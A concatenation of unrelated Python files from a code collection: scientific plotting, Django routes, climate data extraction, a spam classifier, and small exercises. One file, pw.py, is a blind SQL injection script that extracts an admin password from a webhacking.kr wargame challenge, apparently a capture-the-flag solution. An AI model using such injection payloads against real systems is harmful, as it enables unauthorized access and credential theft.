db.select(selection="gap_gw>0.05")  # the second select overrides the first\n    materials = []\n    alpha_x = []\n    alpha_z = []\n    Eg_HSE = []\n    Eg_GW = []\n    Eg_PBE = []\n    thick = []\n    n_2D = []\n    polar = []\n\n    for mol in candidates:\n        if "Cr" in mol.formula:  # CrS2 stuffs are not correct?\n            continue\n        print("{0}-{1}".format(mol.formula, mol.prototype))\n        togo = True\n        for attrib in ("gap", "gap_hse",\n                       "gap_gw", "alphax", "alphaz"):\n            if not hasattr(mol, attrib):\n                warnings.warn("{0} doesn't have attribute {1}!".format(mol.formula,\n                                                                       attrib))\n                togo = False\n        if togo is not True:\n            warnings.warn("{0} not calculated!".format(mol.formula))\n            continue\n        materials.append("{0}-{1}".format(mol.formula, mol.prototype))\n        alpha_x.append(mol.alphax)\n        alpha_z.append(mol.alphaz)\n        Eg_HSE.append(mol.gap_hse)\n        Eg_GW.append(mol.gap_gw)\n        Eg_PBE.append(mol.gap)\n        delta, n, apol = get_thick(mol)\n        thick.append(delta)\n        n_2D.append(n)\n        polar.append(apol)\n\n    print(len(alpha_x))\n    alpha_x = numpy.array(alpha_x)\n    alpha_z = numpy.array(alpha_z)\n    Eg_HSE = numpy.array(Eg_HSE)\n    Eg_GW = numpy.array(Eg_GW)\n    Eg_PBE = numpy.array(Eg_PBE)\n    thick = numpy.array(thick)\n    n_2D = numpy.array(n_2D)\n    polar = numpy.array(polar)\n    return alpha_x, alpha_z, Eg_HSE, thick\n\n'''\nimg_path = "../../tmp_img/"\nplt.style.use("science")\n\n# plt.figure(figsize=(7, 3.5)) #\n# plt.subplot(121) #\n# plt.plot(Eg_HSE, alpha_x * 4 * pi, "o", alpha=0.5) #\n# plt.xlabel("$E_{\\\rm{g}}$ (eV)") #\n# plt.ylabel("$\\\alpha_{xx}/\\\varepsilon_0$ ($\\\AA$)") #\n# #\n# plt.subplot(122) #\n# plt.plot(Eg_HSE, alpha_z * 4 * pi, "o", alpha=0.5) #\n# plt.xlabel("$E_{\\\rm{g}}$ (eV)") #\n# plt.ylabel("$\\\alpha_{zz} / \\\varepsilon_0$ ($\\\AA$)") #\n# #\n# plt.tight_layout() #\n# 
plt.savefig(os.path.join(img #\n # _path, \"alpha_Eg_original.svg\"))\n\n# x-direction\nplt.figure(figsize=(3.5, 3.5))\nplt.plot(Eg_HSE, 1 / (alpha_x), \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=Eg_HSE, y=1/alpha_x)\nprint(k, b, r)\nxx = numpy.linspace(0.3, 8)\nyy = k * xx + b\nplt.plot(xx, yy, \"--\")\nplt.xlabel(\"$E_{\\\\rm{g}}$ (eV)\")\nplt.ylabel(\"$(4 \\\\pi \\\\varepsilon_0)/\\\\alpha_{\\parallel}$ ($\\\\AA^{-1}$)\")\nplt.savefig(os.path.join(img_path, \"alpha_xx_1_Eg.svg\"))\n\n# z-direction\nplt.figure(figsize=(3.5, 3.5))\nplt.plot(thick, alpha_z, \"o\", alpha=0.5)\n# plt.plot(polar, alpha_z, \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=thick, y=alpha_z)\nprint(k, b, r)\nxx = numpy.linspace(2, 10)\nyy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\nplt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.xlabel(\"Thickness ($\\\\AA$)\")\nplt.ylabel(\"$\\\\alpha_{\\\\perp} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_zz_thick.svg\"))\n\n#x-direction\nplt.figure(figsize=(3.5, 3.5))\n# plt.plot(thick, alpha_z, \"o\", alpha=0.5)\nplt.plot(polar, alpha_z, \"o\", alpha=0.5)\n# k, b, r, *_ = linregress(x=thick, y=alpha_z)\n# print(k, b, r)\n# xx = numpy.linspace(2, 10)\n# yy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\n# plt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.text(x=2, y=10, s=\"$\\\\alpha^{\\\\perp} = \\\\frac{\\\\hbar^2 e^2 \\\\rho_e}{m_e E_{\\mathrm{g}}^2}$\")\nplt.xlabel(\"Total Atomic Polarizability per Area (Bohr$^3$)\")\nplt.ylabel(\"$\\\\alpha^{\\\\perp} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_zz_polar.svg\"))\n\n# z-direction with atomic polarizability\nplt.figure(figsize=(3.5, 3.5))\n# plt.plot(thick, alpha_z, \"o\", alpha=0.5)\nplt.plot(polar, alpha_x, \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=thick, y=alpha_z)\nprint(k, b, r)\n# xx = numpy.linspace(2, 10)\n# yy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\n# plt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.xlabel(\"Total Atomic Polarizability per Area (Bohr$^3$)\")\nplt.ylabel(\"$\\\\alpha_{\\\\parallel} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_xx_polar.svg\"))\n\n\n\n'''\n","sub_path":"src/VASP_HSE/gpaw_data.py","file_name":"gpaw_data.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27999052","text":"from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns('blog.views',\n\n url(r'makale/(?P[^/]+)/$', 'makale'),\n url(r'kategori/(?P\\d+)/$', 'kategori'),\n url(r'iletisim/$', 'iletisim'),\n url(r'arama/$', 'arama'),\n\n\n )\n\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"39183466","text":"#!/usr/bin/env python\n\n\"\"\"\nFor each location on David's list, extract the MAT, MAP, AI & elevation\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (21.09.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport os\nimport pandas as pd\nimport csv\nimport requests\n\ndef main():\n\n df = pd.read_csv(\"SITE_LIST.csv\", header=0, sep=\",\")\n places = df.Sitename.values\n\n lats_needed = df[\"Lat_deg\"].values\n lons_needed = df[\"Long_deg\"].values\n\n # Fix units to 
help match the 0.5 degree data\n lats_neededx = [float(x_round(float(i))) for i in lats_needed]\n lons_neededx = [float(x_round(float(i))) for i in lons_needed]\n lats_neededr = [float(i) for i in lats_needed]\n lons_neededr = [float(i) for i in lons_needed]\n\n lats_neededx = dict(zip(places, lats_neededx))\n lons_neededx = dict(zip(places, lons_neededx))\n lats_neededr = dict(zip(places, lats_neededr))\n lons_neededr = dict(zip(places, lons_neededr))\n\n fp = open('sites_and_bioclimatic_stuff.csv', \"w\")\n\n s = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (\"site\",\"lat\",\"lon\",\"elev\",\"mat\",\"map\",\"ai\",\"pet\")\n print(s, end=\"\\n\", file=fp)\n\n nrows = 360\n ncols = 720\n #f = Dataset(\"raw_data/PRE/cru_ts4.00.1971.1980.pre.dat.nc\", 'r')\n #lon = f.variables['lon'][:]\n #print(lon)\n latitudes = np.linspace(-89.75, 89.75, nrows)\n longitudes = np.linspace(-179.75, 179.75, ncols)\n\n\n mapx = np.fromfile(\"MAP_1960_2010.bin\").reshape(nrows, ncols)\n matx = np.fromfile(\"MAT_1960_2010.bin\").reshape(nrows, ncols)\n aix = np.fromfile(\"AI_1960_2010.bin\").reshape(nrows, ncols)\n petx = np.fromfile(\"PET_1960_2010.bin\").reshape(nrows, ncols)\n\n for p in places:\n\n r = np.where(latitudes==lats_neededx[p])[0][0]\n c = np.where(longitudes==lons_neededx[p])[0][0]\n\n # Cape Trib is in the sea at this resolution, so take the adjoining\n # pixel\n if p.strip() == \"Cape Tribulation Crane\":\n c -= 1\n #print(p.strip(), r, c, lats_neededr[p], lons_neededr[p], lats_neededx[p], lons_neededx[p])\n # get elevation\n e = requests.get('http://api.geonames.org/gtopo30JSON?lat=%f&lng=%f&username=mdekauwe' % (lats_neededr[p], lons_neededr[p]))\n elev = e.json()['gtopo30']\n\n s = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (p.strip(), lats_neededr[p],\n lons_neededr[p], elev, matx[r,c],\n mapx[r,c], aix[r,c], petx[r,c])\n print(s, end=\"\\n\", file=fp)\n\n fp.close()\n\ndef x_round(x):\n # Need to round to nearest .25 or .75 to match the locations in CRU\n val = round(x * 4.0) / 4.0\n valx = str(val).split(\".\")\n v1 = valx[0]\n v2 = valx[1]\n\n if v2 <= \"25\":\n v2 = \"25\"\n else:\n v2 = \"75\"\n valx = float(\"%s.%s\" % (v1, v2))\n\n return (valx)\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"extract_site_MAP_MAT_AI_elevation.py","file_name":"extract_site_MAP_MAT_AI_elevation.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"62410949","text":"##########################\r\n#\r\n# Author: Mitesh Khadgi\r\n# Date: 03/24/2019\r\n#\r\n##########################\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport string\r\nfrom numpy import *\r\n\r\n#learning rate value.\r\neta = 0.1\r\n#number of iterations for weightMatrix computation.\r\nnumOfIterations = 100\r\n\r\ndef readAllFiles(path):\r\n allWordsList = []\r\n dicFileWords = {}\r\n files = os.listdir(path)\r\n for file in files:\r\n f = open(path + \"/\" + file, encoding=\"ISO-8859-1\")\r\n words_list = f.read()\r\n words_list = re.sub('[^0-9a-zA-Z]', ' ', words_list)\r\n words_list = words_list.strip().split()\r\n dicFileWords[file] = words_list\r\n allWordsList.extend(words_list)\r\n return allWordsList, dicFileWords\r\n\r\ndef setLabels(numSpamFile, numHamFile):\r\n ClassLabel = []\r\n for i in range(numSpamFile):\r\n ClassLabel.append(0)\r\n for j in range(numHamFile):\r\n ClassLabel.append(1)\r\n return ClassLabel\r\n\r\ndef attributeValue(allWords, dict):\r\n attributeValList = []\r\n for i in dict:\r\n attrVal = [0] * 
(len(allWords)) #Initialize the size of the list - 'attrVal'.\r\n        for word in allWords:\r\n            if word in dict[i]:\r\n                attrVal[allWords.index(word)] = 1\r\n        attrVal.insert(0,1) #Considering x0 attribute equal to 1.\r\n        attributeValList.append(attrVal)\r\n    return attributeValList\r\n\r\ndef sigmoid(x):\r\n    result = 1.0/(1 + exp(-x))\r\n    return result\r\n\r\ndef updateWeights(lamb, trainList, trainLabels):\r\n    attributeMatrix = matrix(trainList)\r\n    finalLabelMatrix = matrix(trainLabels).transpose()\r\n    columns = shape(attributeMatrix)[1]\r\n    weightMatrix = zeros((columns,1)) #Initialize the weightMatrix with zeros with columns as number of rows.\r\n    for i in range(numOfIterations):\r\n        sigma = sigmoid(attributeMatrix*weightMatrix)\r\n        actual = finalLabelMatrix\r\n        predicted = sigma\r\n        yerror = actual - predicted\r\n        weightMatrix = weightMatrix + eta * (attributeMatrix.transpose()*yerror - lamb*weightMatrix)\r\n    return weightMatrix\r\n\r\n\r\ndef classifyLabel(updatedWeight, testList, numTestSpam, numTestHam):\r\n    attributeTestMatrix = matrix(testList)\r\n    sum = attributeTestMatrix * updatedWeight #Raw decision scores (x*w); negative means SPAM, positive means HAM. Note this shadows the built-in 'sum'.\r\n    totalTestSamples = numTestSpam + numTestHam\r\n    correctPred = 0\r\n    hamCorrectPred = 0\r\n    spamCorrectPred = 0\r\n    hamIncorrectPred = 0\r\n    spamIncorrectPred = 0\r\n\r\n    for i in range(numTestSpam):\r\n        if sum[i][0] < 0.0:\r\n            correctPred += 1\r\n            spamCorrectPred += 1\r\n        else:\r\n            spamIncorrectPred += 1\r\n    for j in range(numTestSpam,totalTestSamples): #HAM samples start at index numTestSpam; starting at numTestSpam+1 skipped the first HAM file.\r\n        if sum[j][0] > 0.0:\r\n            correctPred += 1\r\n            hamCorrectPred += 1\r\n        else:\r\n            hamIncorrectPred += 1\r\n\r\n    hamTotal = hamCorrectPred + hamIncorrectPred\r\n    spamTotal = spamCorrectPred + spamIncorrectPred\r\n    hamAccuracy = round(100.0 * hamCorrectPred/hamTotal, 2)\r\n    spamAccuracy = round(100.0 * spamCorrectPred/spamTotal, 2)\r\n    combinedAccuracy = round(100.0 * correctPred/totalTestSamples, 2)\r\n    return sum, hamAccuracy, spamAccuracy, combinedAccuracy\r\n\r\ndef main():\r\n\r\n    print("\\nStarted simulation at 0 seconds\\n")\r\n    print("Please wait to compute the HAM and SPAM accuracies...\\n")\r\n    start = time.time()\r\n\r\n    #Input 2 arguments as train folder and test folder.\r\n    trainFolder = str(sys.argv[1])\r\n    testFolder = str(sys.argv[2])\r\n\t\r\n    #Get all the training folder filenames from the ham folder.\r\n    trainHamPath = trainFolder+'/ham'\r\n\r\n    #Get all the training folder filenames from the spam folder.\r\n    trainSpamPath = trainFolder+'/spam'\r\n\r\n    #Get all the test folder filenames from the ham folder.\r\n    testHamPath = testFolder+'/ham'\r\n\t\r\n    #Get all the test folder filenames from the spam folder.\r\n    testSpamPath = testFolder+'/spam'\r\n\r\n    #lambda value (typical value = 0.001).\r\n    lamb = float(sys.argv[3])\r\n\r\n    #Read the SPAM and HAM training data set and, extract each word in a list for each SPAM and HAM training data file\r\n    trainSpamList, trainSpamDict = readAllFiles(trainSpamPath)\r\n    trainHamList, trainHamDict = readAllFiles(trainHamPath)\r\n\r\n    #Read the SPAM and HAM test data set and, extract each word in a list for each SPAM and HAM test data file\r\n    testSpamList, testSpamDict = readAllFiles(testSpamPath)\r\n    testHamList, testHamDict = readAllFiles(testHamPath)\r\n\r\n    #Get all the unique words from SPAM and HAM in a list.\r\n    allWords = list(set(trainSpamList)|set(trainHamList))\r\n    #Get all the words from SPAM and HAM training data set in a dictionary with key values as filename.\r\n    allWordsTrain = {**trainSpamDict, **trainHamDict}\r\n    #Get all the words from SPAM and HAM test data set in a 
dictionary with key values as filename.\r\n allWordsTest = {**testSpamDict, **testHamDict}\r\n\r\n #Compute the number of SPAM and HAM - training and test data sets.\r\n [numTrainSpam, numTrainHam, numTestSpam, numTestHam] = [len(trainSpamDict), len(trainHamDict), len(testSpamDict), len(testHamDict)]\r\n print(\"Total number of training samples\\t: \", numTrainSpam+numTrainHam)\r\n print(\"Total number of test samples\\t\\t: \", numTestSpam+numTestHam, \"\\n\")\r\n #Set all the labels as SPAM first as '0' and HAM second as '1' in this particular order.\r\n trainLabels = setLabels(numTrainSpam, numTrainHam)\r\n\r\n #Compare each word from the allWords with the allWordsTrain word list, and if the word exists in the training words list, store '1' in the list, otherwise store '0' in the list.\r\n trainList = attributeValue(allWords, allWordsTrain)\r\n #Compare each word from the allWords with the allWordsTest word list, and if the word exists in the test words list, store '1' in the list, otherwise store '0' in the list.\r\n testList = attributeValue(allWords, allWordsTest)\r\n\t\r\n #Compute weights using learning rate as 'eta' and regularization parameter as 'lamb' using Gradient Ascent with L2 regularization.\r\n updatedWeight = updateWeights(lamb, trainList, trainLabels)\r\n #Classify label to the provided test data set and return the number of correct predictions with correct predictions for SPAM and HAM separately to calculate the accuracies for SPAM and HAM with combined accuracy.\r\n sum, hamAccuracy, spamAccuracy, combinedAccuracy = classifyLabel(updatedWeight, testList, numTestSpam, numTestHam)\r\n\r\n print(\"--------------------------------------------------\")\r\n print(\"Accuracy of HAM\\t\\t\\t\\t: \", str(hamAccuracy) + \" %\")\r\n print(\"Accuracy of SPAM\\t\\t\\t: \", str(spamAccuracy) + \" %\")\r\n print(\"Combined Accuracy of HAM and SPAM\\t: \", str(combinedAccuracy) + \" %\")\r\n print(\"--------------------------------------------------\")\r\n\r\n end = time.time()\r\n elapsed = end - start\r\n print(\"\\nCurrent simulation took %f seconds to complete.\" % elapsed)\r\n\r\n print(\"\\nThank You ! 
Program ran Successfully.")\r\n\t\r\nif __name__ == "__main__":\r\n    main()","sub_path":"LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"398814641","text":"'''\nGiven a float base (double) and an integer exponent,\ncompute base raised to the power exponent.\nbase and exponent are guaranteed not to both be 0.\n'''\n\nclass Solution_1:\n    def Power(self, base, exponent):\n        # write code here\n        if base==0 and exponent==0:\n            return 0\n        if exponent == 0:\n            return 1\n        if exponent == 1:\n            return base\n        baseOfEx = 1\n        if exponent > 1:\n            for _ in range(exponent):\n                baseOfEx = baseOfEx * base\n        else:\n            if base == 0:\n                return 0\n            else:\n                for _ in range(-exponent):\n                    baseOfEx = baseOfEx / base\n        \n        return baseOfEx\n\nclass Solution_2:\n    def Power(self, base, exponent):\n        def pow_with_unsigned(base, exponent):\n            if base==0 and exponent==0:\n                return 0\n            if exponent == 0:\n                return 1\n            if exponent == 1:\n                return base\n            result = pow_with_unsigned(base, exponent>>1)\n            result *= result\n            if exponent & 1 == 1:\n                result *= base\n\n            return result\n        \n        if exponent < 0:\n            if base == 0:\n                return 0\n            else:\n                return 1 / pow_with_unsigned(base, -exponent)\n        else:\n            return pow_with_unsigned(base, exponent)\n\n    ","sub_path":"src/16.数值的整数次方-代码的完整性.py","file_name":"16.数值的整数次方-代码的完整性.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"544597105","text":"# -*- coding: utf-8 -*-\n"""\n/***************************************************************************\n QGIS plugin to integrate Point Clouds from LIDAR or Photogrammetry\n copyright : (C) David Hernandez Lopez\n email : david.hernandez@uclm.es\n ***************************************************************************/\n"""\n\n# Import PyQt5 classes\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\n\n# Import Python classes\nimport os\n\nimport sys\nsys.path.append(os.path.dirname(__file__))\n# This loads your .ui file so that PyQt can populate your plugin with the elements from Qt Designer\nFORM_CLASS, _ = uic.loadUiType(os.path.join(os.path.dirname(__file__),\n                                            'point_cloud_3d_about_qdialog.ui'),\n                               resource_suffix='')\n\nclass AboutQDialog(QtWidgets.QDialog,\n                   FORM_CLASS):\n    def __init__(self,\n                 parent=None):\n        """Constructor."""\n        super(AboutQDialog, self).__init__(parent)\n        # Set up the user interface from Designer through FORM_CLASS.\n        # After self.setupUi() you can access any designer object by doing\n        # self.<objectname>, and you can use autoconnect slots - see\n        # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n        # #widgets-and-dialogs-with-auto-connect\n        self.setupUi(self)","sub_path":"point_cloud_3d_about_qdialog.py","file_name":"point_cloud_3d_about_qdialog.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"659133","text":"import requests\n\nURL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='\nTRUE_PHRASE = 'wrong password'  # shown whenever the injected condition selects the admin row, so it serves as the blind-SQLi oracle\n\ndef query(payload):\n    r = requests.get(URL + payload)\n    Content = r.text\n    return TRUE_PHRASE in Content\n\n\ndef find_pw_length():\n    pw_len = 1\n    while query("' or id='admin' and length(pw)={}%23".format(pw_len)) is False:\n        pw_len += 1\n    print('pw_len: {}'.format(pw_len))\n    return pw_len\n\ndef find_pw():\n    pw_len = find_pw_length()\n    pw = ''\n    for pos in range(1, pw_len + 1):\n        for character in range(0, 128):\n            if query("' or id='admin' and 
ord(substr(pw,{},1))={}%23\".format(pos, character)) is True:\n pw += chr(character)\n break\n print('pw: {}'.format(pw))\n\nfind_pw()","sub_path":"pw.py","file_name":"pw.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"75351321","text":"#!/usr/bin/env python3\n\nimport random, os\n\nanswers = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix',\n 'Arkansas': 'Little Rock', 'California': 'Sacramento', 'Colorado': 'Denver',\n 'Connecticut': 'Hartford', 'Delaware': 'Dover', 'Florida': 'Tallahassee',\n 'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise', 'Illinois':\n 'Springfield', 'Indiana': 'Indianapolis', 'Iowa': 'Des Moines', 'Kansas':\n 'Topeka', 'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge', 'Maine':\n 'Augusta', 'Maryland': 'Annapolis', 'Massachusetts': 'Boston', 'Michigan':\n 'Lansing', 'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson', 'Missouri':\n 'Jefferson City', 'Montana': 'Helena', 'Nebraska': 'Lincoln', 'Nevada':\n 'Carson City', 'New Hampshire': 'Concord', 'New Jersey': 'Trenton', 'New Mexico': 'Santa Fe', 'New York': 'Albany', 'North Carolina': 'Raleigh',\n 'North Dakota': 'Bismarck', 'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City',\n 'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg', 'Rhode Island': 'Providence',\n 'South Carolina': 'Columbia', 'South Dakota': 'Pierre', 'Tennessee':\n 'Nashville', 'Texas': 'Austin', 'Utah': 'Salt Lake City', 'Vermont':\n 'Montpelier', 'Virginia': 'Richmond', 'Washington': 'Olympia', 'West Virginia': 'Charleston', 'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'}\n\n\ntester = list(answers.items())\n\n# print(tester) #debug\n\nrandom.shuffle(tester)\n\n# print(tester) #debug\n\nquestion_file = open('ch8_questions.txt','w')\nanswer_file = open('ch8_answers.txt', 'w')\n\ndef dummyAnswers(capsDict, state):\n fourChoice = []\n # print(fourChoice) #debug\n fourChoice.append(capsDict[state])\n # print(fourChoice) #debug\n caps_list = list(capsDict.values())\n random.shuffle(caps_list)\n # print(caps_list) #debug\n for i in range(len(capsDict)):\n # print(len(capsDict))\n # print(caps_list[i]) #debug\n if caps_list[i] == fourChoice[0]:\n continue\n else:\n # fourChoice += caps_list[i] #This for some reason adds just the ith character of the \n fourChoice += [caps_list[i]] #This adds the string as a new entry in the list\n if len(fourChoice) >= 4:\n break\n # print(fourChoice) #debug\n # random.shuffle(fourChoice)\n return fourChoice\n\nprint(dummyAnswers(answers, 'California')) #debug\n\nj = 1\nfor a, b in tester:\n selected_answers = dummyAnswers(answers, a)\n random.shuffle(selected_answers)\n question_file.write(str(j) + '. What is the capital of ' + a + '?\\n')\n h = 0\n for k in selected_answers:\n if h >= 3:\n question_file.write('\\tD. ' + k + '\\n')\n if k == b:\n answer_file.write(str(j) + ') D. ' + k + '\\n')\n elif h == 2:\n question_file.write('\\tC. ' + k)\n if k == b:\n answer_file.write(str(j) + ') C. ' + k + '\\n')\n elif h == 1:\n question_file.write('\\tB. ' + k)\n if k == b:\n answer_file.write(str(j) + ') B. ' + k + '\\n')\n elif h == 0:\n question_file.write('\\tA. ' + k)\n if k == b:\n answer_file.write(str(j) + ') A. 
' + k + '\\n')\n h += 1\n j += 1\n\nquestion_file.close()\nanswer_file.close()\n\n# for q, a in answers.items():\n# # os.write('What is the capital of ' + q + '?','questions.txt')\n# print('What is the capital of ' + q + '?')\n# choices = dummyAnswers(answers, q) #debug\n\n\n\n\n \n\n#choose a random three captials to be the other answers\n\n#turn the list of the correct answer and three random capitals to be a randomized list\n\n#make a dictionary of four items, with the key being A, B, C, or D and the value being the capital assigned to it\n\n#print the question, along with the four answers, using A, B, C, D\n\n#repeat, such that a list of 35\n\n\"\"\"OR an alternate method would be to create a dictionary with {'state':{'correct answer',{'random answer 1', 'random answer 2', 'random answer 3'}}}.\nHowever, as I write this, I see that this might make things overly complex, as I'm still not an expert at nexted dictionaries\n\"\"\"\n\n# os.close('questions.txt')\n\n","sub_path":"2017_Summer/ch8_geography_quiz_v2.py","file_name":"ch8_geography_quiz_v2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253133552","text":"import numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport seaborn as sns\r\n\r\ndf = pd.read_csv(\r\n r'C:\\Users\\vidya\\OneDrive\\Desktop\\Python_coding_practice_Datasets\\PythonDataSets\\Feature_selection_Gs\\mercedesebenz\\train.csv',\r\n usecols=['X0', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X8'])\r\nprint(df.columns)\r\nprint(df.shape)\r\n\r\n# print(df['X0'].value_counts())\r\nfor col in df.columns:\r\n print(col, ':', len(df[col].unique()))\r\n pass\r\n\r\n# print(df['X0'].value_counts().sort_values(ascending=False))\r\ntop_15_X0 = df['X0'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X0 = list(top_15_X0)\r\nfor label in top_15_X0:\r\n a = 'X0_' + label\r\n df[a] = np.where(df['X0'] == label, 1, 0)\r\n top_15_X0[top_15_X0.index(label)] = a\r\nprint(df[['X0'] + top_15_X0].head(2))\r\n\r\ntop_15_X1 = df['X1'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X1 = list(top_15_X1)\r\nfor label in top_15_X1:\r\n a = 'X1_' + label\r\n df[a] = np.where(df['X1'] == label, 1, 0)\r\n top_15_X1[top_15_X1.index(label)] = a\r\nprint(top_15_X1)\r\nprint(df[['X1'] + top_15_X1].head(2))\r\n\r\n\r\n\r\ntop_15_X2 = df['X2'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X2 = list(top_15_X2)\r\nprint(top_15_X2)\r\nfor label in top_15_X2:\r\n a = 'X2_' + label\r\n df[a] = np.where(df['X2'] == label, 1, 0)\r\n top_15_X2[top_15_X2.index(label)] = a\r\nprint(df[['X2'] + top_15_X2].head(2))\r\n\r\ntop_7_X3 = df['X3'].value_counts().sort_values(ascending=False).head(7).index\r\ntop_7_X3 = list(top_7_X3)\r\nfor label in top_7_X3:\r\n a = 'X3_'+label\r\n df[a] = np.where(df['X3'] == label, 1, 0)\r\n top_7_X3[top_7_X3.index(label)] = a\r\nprint(df[['X3'] + top_7_X3].head(2))\r\n\r\n\r\ntop_4_X4 = df['X4'].value_counts().sort_values(ascending=False).head(4).index\r\ntop_4_X4 = list(top_4_X4)\r\n# print(top_4_X4)\r\nfor label in top_4_X4:\r\n a = 'X4_' + label\r\n df[a] = np.where(df['X4'] == label, 1, 0)\r\n top_4_X4[top_4_X4.index(label)] = a\r\nprint(df[['X4'] + top_4_X4].head(2))\r\n\r\n\r\n\r\n\r\ntop_20_X5 = df['X5'].value_counts().sort_values(ascending=False).head(20).index\r\ntop_20_X5 = list(top_20_X5)\r\nfor label in top_20_X5:\r\n a = 'X5_' + label\r\n df[a] = np.where(df['X5'] == label, 1, 
0)\r\n top_20_X5[top_20_X5.index(label)] = a\r\nprint(df[['X5'] + top_20_X5].head(2))\r\n\r\n\r\ntop_7_X6 = df['X6'].value_counts().sort_values(ascending=False).head(7).index\r\ntop_7_X6 = list(top_7_X6)\r\n# print(top_7_X6)\r\nfor label in top_7_X6:\r\n a = 'X6_' + label\r\n df[a] = np.where(df['X6'] == label, 1, 0)\r\n top_7_X6[top_7_X6.index(label)] = a\r\nprint(df[['X6'] + top_7_X6].head(2))\r\n\r\ntop_15_X8 = df['X8'].value_counts().sort_values(ascending=False).head(15).index\r\ntop_15_X8 = list(top_15_X8)\r\n# print(top_15_X8)\r\nfor label in top_15_X8:\r\n a = 'X8_' + label\r\n df[a] = np.where(df['X8'] == label, 1, 0)\r\n top_15_X8[top_15_X8.index(label)] = a\r\nprint(df[['X8'] + top_15_X8].head(2))\r\n\r\n\r\nprint(df.columns)\r\nprint(len(df.columns))\r\ndf.drop(['X0', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X8'],axis=1, inplace=True)\r\n\r\nprint(len(df.columns))\r\nprint(df.columns)\r\ny= pd.read_csv(\r\n r'C:\\Users\\vidya\\OneDrive\\Desktop\\Python_coding_practice_Datasets\\PythonDataSets\\Feature_selection_Gs\\mercedesebenz\\train.csv',\r\n usecols=['y'])\r\nprint(df.shape, y.shape)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(df, y, test_size=0.2, random_state=12)\r\nprint(x_train.shape, x_test.shape)\r\nimport math\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import r2_score,mean_squared_error\r\nLR= LinearRegression().fit(x_train, y_train)\r\ny_train_predict = LR.predict(x_train)\r\nprint('r2 score: ', r2_score(y_train, y_train_predict))\r\nprint('RMSE: ', math.sqrt(mean_squared_error(y_train, y_train_predict)))\r\n\r\ny_test_predict = LR.predict(x_test)\r\nprint('r2 score: ', r2_score(y_test, y_test_predict))\r\nprint('RMSE: ', math.sqrt(mean_squared_error(y_test, y_test_predict)))\r\ncoef = LR.coef_\r\n#print('Coefficients for linear regression: ', coef)\r\nprint('Intercept for linear regression: ', LR.intercept_)\r\nprint('Coefficient of LR model')\r\nl = list(coef)[0]\r\nl = [round(i, 3) for i in l]\r\nprint(len(l), l)\r\nl1 =[i for i in range(len(l))]\r\nprint(len(l1), l1)\r\nplt.bar(l1, l)\r\nplt.title('Variable importance for categorical variables')\r\nplt.xticks(range(len(l1)), list(df.columns))\r\nplt.ylim(-40,40)\r\nplt.show()\r\n\r\nprint('Vraibles with sorted values')\r\n\r\nl_sort_value = sorted(l)\r\nprint(l_sort_value)\r\nl_sort_arg = 